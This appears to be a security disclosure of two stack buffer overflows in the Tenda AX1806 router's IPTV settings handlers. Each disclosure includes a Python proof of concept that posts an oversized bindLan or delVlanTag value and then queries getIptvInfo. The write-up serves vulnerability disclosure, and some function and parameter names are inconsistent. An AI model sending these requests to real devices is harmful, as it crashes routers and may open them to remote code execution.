For how to set variables through the SetValue function, refer to this link
https://detailed-stetson-767.notion.site/Tenda-AX1806-Buffer-Overflow-in-formSetIptv-cebf9202122a4582ae86c5253b3f6da3?pvs=4
Tenda AX1806 v1.0.0.1 contains a stack overflow via the iptv.stb.port parameter in the function setIptvInfo.
In this function, it GetValue from cfm and SetValue by data from post param bindLan. The first time call formSetIptv , SetValue with a string whose length longer than v16(64), the second time call getIptvInfo will Use the Getvalue to assign the string value to the local variable v16 .In the end,it will cause buffer overflow or even allows a remote attacker to execute arbitrary code.
import requests
url = "<http://192.168.188.157/goform/SetIPTVCfg>"
payload = "a"*1000
data = {"bindLan": payload}
response = requests.post(url, data=data)
url = "<http://192.168.188.157/goform/getIptvInfo>"
response = requests.post(url, data=data)
print(response.text)
Tenda AX1806 v1.0.0.1 contains a stack overflow via the iptv.stb.mode parameter in the function setIptvInfo.
In this function, it GetValue from cfm and SetValue by data from post param delVlanTag. The first time call formSetIptv , SetValue with a string whose length longer than v17(64), the second time call setIptvInfo will Use the Getvalue to assign the string value to the local variable v17.In the end,it will cause buffer overflow or even allows a remote attacker to execute arbitrary code.
import requests
url = "<http://192.168.188.157/goform/SetIPTVCfg>"
payload = "a"*1000
data = {"delVlanTag": payload}
response = requests.post(url, data=data)
url = "<http://192.168.188.157/goform/getIptvInfo>"
response = requests.post(url, data=data)
print(response.text)